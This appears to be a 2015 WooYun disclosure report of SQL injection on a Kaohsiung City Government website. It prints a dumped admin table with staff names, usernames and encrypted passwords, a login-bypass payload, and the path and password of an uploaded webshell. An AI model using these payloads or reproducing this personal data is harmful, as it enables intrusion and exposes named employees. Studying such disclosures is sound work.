当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155502

漏洞标题:高雄市政府某站Getshell(臺灣地區)

相关厂商:高雄市政府

漏洞作者: 路人甲

提交时间:2015-11-24 15:03

修复时间:2016-01-11 21:14

公开时间:2016-01-11 21:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

SQL URL:
http://**.**.**.**/wcyc/news_detail.aspx?Activity_id=1

QQ图片20151124142607.jpg


Database: wcyc
Table: admin
[21 entries]
+----------+----------+---------------------+------------+------------+---------
------------+-------------+---------------------+---------------+---------------
-----------+----------------+-----------------+
| Group_ID | Admin_ID | UpdateTime          | Admin_Name | Admin_Stop | CreateTi
me          | Update_User | Admin_Email         | Admin_Account | Admin_PassWord
           | Admin_Position | Admin_available |
+----------+----------+---------------------+------------+------------+---------
------------+-------------+---------------------+---------------+---------------
-----------+----------------+-----------------+
| 1        | 2        | 2012-07-17 11:23:00 | openghost  | 正常使用       | 2010
-04-20 14:45:00 | 2           | openghost@**.**.**.**    | openghost     | AhXMAgcob+
k=             | 助理             | 開啟              |
| 1        | 9        | 2014-09-18 09:14:00 | 賴秋伶        | 正常使用       | 2
014-09-18 09:14:00 | 2           | chunling@**.**.**.** | chunling      | hTnKa3R
fmqJORyIVugwZUg== | 社會工作員【正式】      | <blank>         |
| 4        | 10       | 2014-09-18 09:15:00 | 蕭惠如        | 正常使用       | 2
014-09-18 09:15:00 | 2           | huiju@**.**.**.**    | huiju         | G6bpZoQ
c9v0heO4Dhpf5vQ== | 主任督導【正式】       | <blank>         |
| 4        | 11       | 2014-09-18 09:16:00 | 孔昭懿        | 正常使用       | 2
014-09-18 09:16:00 | 2           | Kci220@**.**.**.**   | Kci220        | 4/froHd
+zx0tCHiUW6c79A== | 約聘主任督導員        | <blank>         |
| 4        | 12       | 2014-09-18 09:17:00 | 謝素芬        | 正常使用       | 2
014-09-18 09:17:00 | 2           | annane@**.**.**.**   | annane        | vNCkJf2
AdIjHAm8+JIUZnA== | 約聘社工督導         | <blank>         |
| 4        | 13       | 2014-09-18 09:17:00 | 周庭鈺        | 正常使用       | 2
014-09-18 09:17:00 | 2           | tychou@**.**.**.**   | tychou        | dp0MxKu
Ay0FaLzweUxKUvw== | 約聘社工督導         | <blank>         |
| 4        | 14       | 2014-09-18 09:18:00 | 王君儀        | 正常使用       | 2
014-09-18 09:18:00 | 2           | jywang@**.**.**.**   | jywang        | a9JWaD4
zheOj04v9/AWZ9w== | 約聘社工督導         | <blank>         |
| 4        | 15       | 2014-09-18 09:18:00 | 李偉花        | 正常使用       | 2
014-09-18 09:18:00 | 2           | annali@**.**.**.**   | annali        | gxxypvz
Pmtf/cUBYQT9J1A== | 約聘社工員          | <blank>         |
| 4        | 16       | 2014-09-19 09:03:00 | 卓春嫻        | 正常使用       | 2
014-09-18 09:19:00 | 2           | g007cho@**.**.**.**  | g007cho       | dwSg42Y
Rbf3zDVZMeqsxKg== | 約聘社工員          | <blank>         |
| 4        | 17       | 2014-09-18 09:20:00 | 張仁萍        | 正常使用       | 2
014-09-18 09:20:00 | 2           | jenpinc@**.**.**.**  | jenpinc       | RqGKrG1
B+fR+VFXWIY7g5A== | 約聘社工員          | <blank>         |
| 4        | 18       | 2014-09-18 09:20:00 | 黃彥妮        | 正常使用       | 2
014-09-18 09:20:00 | 2           | swerynh@**.**.**.**  | swerynh       | nKSAZHo
iWDL0+PWqGD9QvA== | 約聘社工員          | <blank>         |
| 4        | 19       | 2014-09-18 09:21:00 | 李美蓮        | 正常使用       | 2
014-09-18 09:21:00 | 2           | g0003@**.**.**.**    | g0003         | WsM7qwd
t/3qQCVTmL8At9g== | 約聘社工員          | <blank>         |
| 4        | 20       | 2014-09-18 09:22:00 | 林懿君        | 正常使用       | 2
014-09-18 09:21:00 | 2           | daging@**.**.**.**   | daging        | yvRmxpv
WgUwvG6SM6eYC7w== | 約聘社工員          | <blank>         |
| 4        | 21       | 2014-09-18 09:22:00 | 林偉傑        | 正常使用       | 2
014-09-18 09:22:00 | 2           | mts70227@**.**.**.** | mts70227      | tE5E5p7
zdFK5C2Tch5h4Yg== | 約聘社工員          | <blank>         |
| 4        | 22       | 2014-09-18 09:23:00 | 林科蓉        | 正常使用       | 2
014-09-18 09:23:00 | 2           | krlin@**.**.**.**    | krlin         | D2aBusN
bon2C6fJl25/SYw== | 約聘社工員          | <blank>         |
| 4        | 23       | 2014-09-18 09:23:00 | 王輝龍        | 正常使用       | 2
014-09-18 09:23:00 | 2           | E1208@**.**.**.**    | E1208         | opP9Lap
QNzRJSGwTE4lgFQ== | 約聘人員           | <blank>         |
| 4        | 24       | 2014-09-18 09:24:00 | 楊書豪        | 正常使用       | 2
014-09-18 09:24:00 | 2           | Soho6123@**.**.**.** | Soho6123      | B6ipxQs
MYog1EBvn39kM/g== | 約僱人員           | <blank>         |
| 4        | 25       | 2014-09-18 09:24:00 | 廖敏惠        | 正常使用       | 2
014-09-18 09:24:00 | 2           | mhliao@**.**.**.**   | mhliao        | TdKS6ta
/SLof+ZgupYo/8A== | 約僱人員           | <blank>         |
| 4        | 26       | 2014-09-18 09:25:00 | 宋秋華        | 正常使用       | 2
014-09-18 09:25:00 | 2           | chiouhua@**.**.**.** | chiouhua      | cLJ4M12
9u7+kfJSVNrVhAw== | 約聘社工員          | <blank>         |
| 4        | 27       | 2015-08-24 09:26:00 | 鄭立楹        | 正常使用       | 2
015-05-08 10:11:00 | 9           | cheng012@**.**.**.** | cheng012      | lge6RNK
l8imHQFoqcUjhVg== | 約聘社工員          | <blank>         |
| 4        | 28       | 2015-07-28 14:04:00 | 吳采蓉        | 正常使用       | 2
015-07-28 14:04:00 | 9           | tjwu0307@**.**.**.** | tjwu0307      | +TW3QuE
lMwlcNL/M1Pg8EQ== | 約聘社工員          | <blank>         |


密碼加密沒解開發現後臺登入點存在post注入就構造萬能密碼進入

URL:http://**.**.**.**/wcyc/admin/Index.aspx
openghost'or'1'='1  1231231


QQ图片20151124142909.png


可上傳webshell
http://**.**.**.**/wcyc/file/activity/957/54_aa.aspx -7

另注入可直接獲取system許可權
QQ图片20151124143032.jpg

漏洞证明:

http://**.**.**.**/wcyc/file/activity/957/54_aa.aspx -7

修复方案:

SQL

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-27 21:14

厂商回复:

感謝通報

最新状态:

暂无